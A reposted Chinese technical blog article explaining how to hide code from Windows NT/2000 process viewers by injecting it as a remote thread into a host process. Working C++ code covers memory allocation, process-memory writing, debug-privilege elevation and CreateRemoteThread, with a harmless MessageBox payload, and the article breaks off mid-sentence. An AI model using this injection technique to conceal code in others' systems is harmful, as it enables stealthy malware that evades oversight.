WinNT&Win2K下实现进程的完全隐藏(转)

WinNT&Win2K下实现进程的完全隐藏(转)[@more@]

　　关于进程的隐藏，98下的例子数不胜数。WinNT/Win2K下的隐藏方法，西祠的高手shotgun在去年的6月就已经在网上发布出实例《揭开木马的神秘面纱》 ，我也多次拜读他的文章，对他的计算机水平及热心帮助朋友的作风十分敬佩。这里也可算是对shotgun的文章的补充与深入介绍吧，好了，闲话少说。

　　在WinNT下"真正隐藏进程"这一说法，可以讲是根本不可能实现，只要我们的程序是以进程内核的形式运行，都是不可能逃离CTRL+ALT+DEL的法眼。那么奇怪了，这岂不是与我们的标题《WinNT & Win2K下实现进程的完全隐藏》相矛盾吗？是的，实际上应该是：以非进程方式执行目标代码，而逃避进程查看器的检查，从而达到"进程隐藏"的目的。

　　我们这里用的，是在宿主进程中，以线程的方式执行我们的代码。实现起来非常简单。

　　首先，我们先建立一个不执行任何语句的线程

　　DWORD stdcall ThreadProc(LPVOID *lpVoid){

　　return 0;

　　}

　　然后，将线程代码拷备至宿主进程所能够执行的任何地方(即页面属性为PAGGE_EXECUTE_READWRITE)，如：共享内存影射区、宿主进程内。这里我们选择宿主进程，拷备的时侯，我们需要先在宿主进程中使用VirtualAllocEx函数申请一段内存，然后再使用WriteP rocessMemory将线程体写入宿主进程中。

　　以上工作完成后，我们便可CreateRemoteThread函数激活其执行。下面给出一个完整的例子

　　//远程线程执行体

　　DWORD __stdcall ThreadProc (void *lpPara){

　　return 0;

　　}

　　int main(int argc, char* argv[]){

　　const DWORD THREADSIZE=1024*4;//暂定线程体大小为4K，实际上没这么大，稍后我将会介绍

　　DWORD byte_write;

　　//获得指定进程ID句柄，并设其权限为PROCESS_ALL_ACCESS,992是宿进程的ID号,获取ID号的方法这里我就不多讲了

　　HANDLE hWnd = :penProcess (PROCESS_ALL_ACCESS,FALSE,992);

　　if(!hWnd)return 0;

　　void *pRemoteThread =::VirtualAllocEx(hWnd,0,THREADSIZE,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);//申请

　　if(!pRemoteThread)return 0;

　　if(!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,THREADSIZE,0))//写入进程

　　return 0;

　　//启动线程

　　HANDLE hThread = ::CreateRemoteThread (hWnd ,0,0,(DWORD (__stdcall *)(void*))pRemoteThread ,NULL,0,&byte_write);

　　if(!hThread){ //还有内存分配未释放

　　return 0;

　　}

　　return 0;

　　}

　　到这里，对于隐藏的方法就算告一段落，相信看过的朋友对这个思路有个非常明确的概念了吧。

　　在理解隐藏的方法后，我们着重开始写线程的执行部分了。如下：

　　DWORD __stdcall ThreadProc(void *lpPara){

　　MessageBox(NULL,"hello","hello",0);

　　return 0;

　　}

　　编译执行后，你会发现出现一个非法操作错误，为什么呢？在我们以段页式内存管理的win2K操作系统中，编译时会把所有的常量编译在PE文件的.data节中，而代码段则在.text中，所以，我们拷备到宿主进程中的代码是在.text中的代码，MessageBox(NULL,(char *)指针,p,0);所指向的地址是本进程的内存虚拟地址。而在宿主进程中是无法访问的。解决的方法很简单，按旧照搬的将"hello"也拷备到目标进程中，然后再引用。同理，MessageBox函数地址编译时，也是保存在.Import中，写过Win2k病毒的朋友都知道，所有常量与函数入口地址都需在代码段定义与得出，我们这里也与他有点类似。言归正传，同样情况我们也把函数的入口地址一起写入目标进程中。//先定义参数结构typedef struct _RemotePara{//参数结构

　　char pMessageBox[12];

　　DWORD dwMessageBox;

　　}RemotePara;

　　//付值

　　RemotePara myRemotePara;

　　::ZeroMemory(&myRemotePara,sizeof(RemotePara));

　　HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");

　　myRemotePara.dwMessageBox =(DWORD) ::GetProcAddress (hUser32 , "MessageBoxA");

　　strcat(myRemotePara.pMessageBox,"hello");

　　//写进目标进程

　　RemotePara *pRemotePara =(RemotePara *) ::VirtualAllocEx (hWnd ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);//注意申请空间时的页面保护属性

　　if(!pRemotePara)return 0;

　　if(!::WriteProcessMemory (hWnd ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;

　　//启动进将参数传递进入

　　HANDLE hThread = ::CreateRemoteThread (hWnd ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);

　　if(!hThread){

　　return 0;

　　}好了，就这么简单，下在给出一个弹出一个MessageBox的实例：// RemoteThread.cpp: Defines the entry point for the console application.

　　//

　　#include "stdafx.h"

　　typedef struct _RemotePara{//参数结构

　　char pMessageBox[12];

　　DWORD dwMessageBox;

　　}RemotePara;

　　//远程线程

　　DWORD __stdcall ThreadProc (RemotePara *lpPara){

　　typedef int (__stdcall *MMessageBoxA)(HWND,LPCTSTR,LPCTSTR,DWORD);//定义MessageBox函数

　　MMessageBoxA myMessageBoxA;

　　myMessageBoxA =(MMessageBoxA) lpPara->dwMessageBox ;//得到函数入口地址

　　myMessageBoxA(NULL,lpPara->pMessageBox ,lpPara->pMessageBox,0);//call return 0;

　　}

　　void EnableDebugPriv();//提升应用级调试权限

　　int main(int argc, char* argv[]){

　　const DWORD THREADSIZE=1024*4;

　　DWORD byte_write;

　　EnableDebugPriv();//提升权限

　　HANDLE hWnd = :penProcess (PROCESS_ALL_ACCESS,FALSE,992);

　　if(!hWnd)return 0;

　　void *pRemoteThread =::VirtualAllocEx(hWnd,0,THREADSIZE,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);

　　if(!pRemoteThread)return 0;

　　if(!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,THREADSIZE,0))

　　return 0;

　　//再付值

　　RemotePara myRemotePara;

　　::ZeroMemory(&myRemotePara,sizeof(RemotePara));

　　HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");

　　myRemotePara.dwMessageBox =(DWORD) ::GetProcAddress (hUser32 , "MessageBoxA");

　　strcat(myRemotePara.pMessageBox,"hello");

　　//写进目标进程

　　RemotePara *pRemotePara =(RemotePara *) ::VirtualAllocEx (hWnd ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);//注意申请空间时的页面属性

　　if(!pRemotePara)return 0;

　　if(!::WriteProcessMemory (hWnd ,pRemotePara,&myRemotePara,sizeof myRemote

　　Para,0))return 0;

　　//启动线程

　　HANDLE hThread = ::CreateRemoteThread (hWnd ,0,0,(DWORD (__stdcall *)(voi

　　d *))pRemoteThread ,pRemotePara,0,&byte_write);

　　if(!hThread){

　　return 0;

　　}

　　return 0;

　　}

　　//提升权限

　　void EnableDebugPriv( void )

　　{

　　HANDLE hToken;

　　LUID sedebugnameValue;

　　TOKEN_PRIVILEGES tkp;

　　if ( ! OpenProcessToken( GetCurrentProcess(),

　　TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )

　　return;

　　if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ){

　　CloseHandle( hToken );

　　return;

　　}

　　tkp.PrivilegeCount = 1;

　　tkp.Privileges[0].Luid = sedebugnameValue;

　　tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

　　if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL )

　　)

　　CloseHandle( hToken );

　　}

　　好了，程序编译执行后会在进程号为992的进程中创建一线程，弹出hello对话框。是不是非常简单呢！

　　这里有几个地方需要注意的：

　　1、远程线程在宿主进程中申请空间时，空间大小的确定了是我一直无法解决的问题。我曾使用两个贴近一起的线程，以线程间的距离大小，并加上参数大小，作为申请空间时，仍然会出现非法操作，如下：

　　static void StartThread (LPVOID *lpPara){

　　return ;

　　}

　　static void EndThread(LPVOID *lpPara){

　　return;

　　}

　　然后使用DWORD dwLenght = (DWORD)((char *)&StartThread - (char *)&EndThread);

　　//得到StartThread线程代码长度，dwLenght += sizeof(ThreadPara); 仍会出现非法操作让我很迷惑。在win2k中，线程的默认堆栈的页大小是4KB，这里我在为线程申请内存时，申请的大小暂时使用一个常数，始终为4KB的倍数，选取时尽量取大，在线程可成功运行后，再一点点改小。办法是笨了点，如这里的朋友有更好的方法，请不吝赐教。

　　2、什么时侯，什么参数是需要从外部传递进来的呢？我这里并没有一个十分有力的答案，我的理解是：PE文件中除了.text节以外的所有节，均需使用外部参数传递到线程中使用，如：.rsrc、.data、rdata等其他的15个节。在我们实际编写的过程中，初学者并不知道我们的代码会编译在什么地方，这个时侯，我们可以在运行的时侯ALT + 8（VC中快捷键）反编译过来，一般有lea eax p、push offset p等取地址语句，这个时侯，我们大都需要以

　　

本文来自：http://www.linuxpk.com/30663.html

--&gtlinux电子图书免费下载和技术讨论基地

·上一篇： HTML标签对ASP聊天室和论坛搞破坏

·下一篇： 得到了代理服务器地址该如何使用

最新更新
	·注册表备份和恢复 ·低级格式化的主要作用 ·如何防范恶意网站 ·常见文件扩展名和它们的说明 ·专家：警惕骇客骗局，严守企业信息 ·PGPforWindows介紹基本设定(2) ·解剖安全帐号管理器（SAM）结构 ·“恶作剧之王”揭秘 ·绿色警戒 ·黑客反击战 ·网络四大攻击方法及安全现状描述 ·可攻击3种浏览器代码流于互联网 ·黑客最新的兴趣点,下个目标会是谁? ·“僵尸”——垃圾邮件的主要传播源 ·Lebreat蠕虫惊现3变种 ·POSTFIX反病毒反垃圾Ų… ·在FreeBSD上用PHP实现在线添加FTP用户 ·简单让你在FreeBSDADSL上… ·安全版本：OpenBSD入门技巧解析 ·Internet连接共享上网完全攻略 ·关于ADSL上网网速常识 ·静态缓存和动态缓存的比较 ·最友好的SQL注入防御方法 ·令网站提速的7大秘方 ·网络基础知识大全 ·路由基本知识 ·端口映射的几种实现方法 ·VLAN经典诠释 ·问题分析与解决——ADSL错误代码 ·问题分析——关于2条E1的线路绑定

关于我们 | 联系方式 | 广告合作 | 诚聘英才 | 网站地图 | 网址大全 | 友情链接 | 免费注册

Copyright © 2004 - 2007 All Rights Reserved 来自 “ ITPUB博客 ” ，链接：http://blog.itpub.net/10763080/viewspace-970212/，如需转载，请注明出处，否则将追究法律责任。 0 0 分享到： 上一篇： HTML标签对ASP聊天室和论坛搞破坏(转) 下一篇： 介绍一套给网管使用的安全检查工具(转) 请登录后发表评论 登录 全部评论 <%=items[i].createtime%> <%=items[i].content%> <%if(items[i].items.items.length) { %> <%for(var j=0;j <%=items[i].items.items[j].createtime%> 回复 <%=items[i].items.items[j].username%>   回复   <%=items[i].items.items[j].tousername%>： <%=items[i].items.items[j].content%> <%}%> <%if(items[i].items.total > 5) { %> 还有<%=items[i].items.total-5%>条评论 ) data-count=1 data-flag=true>点击查看 <%}%> <%}%> <%}%> RegisterForBlog 博文量 297 访问量 1578949 最新文章 eTrust全方位实现安全管理(转) 电子支付与安全的关系及其经济分析二(转) 电子支付与安全的关系及其经济分析三(转) 让个人电脑也拥有一把保护伞—个人防火墙(转) 整体大于部分之和—ServGate的整合安全(转) 识破病毒的“障眼法”进一步防御病毒(转) 实验室环境下测试千兆入侵检测系统(转) 病毒肆虐信息安全问题不容忽视(转) 覆盖*printf()系列函数本身的返回地址(转) 中国信息安全体系机构基本框架与构想(转) 支持我们 作者招募 用户协议 FAQ Contact Us 北京盛拓优讯信息技术有限公司. 版权所有  京ICP备09055130号-4  北京市公安局海淀分局网监中心备案编号：11010802021510 广播电视节目制作经营许可证(京) 字第1234号 中国互联网协会会员

转载于:http://blog.itpub.net/10763080/viewspace-970212/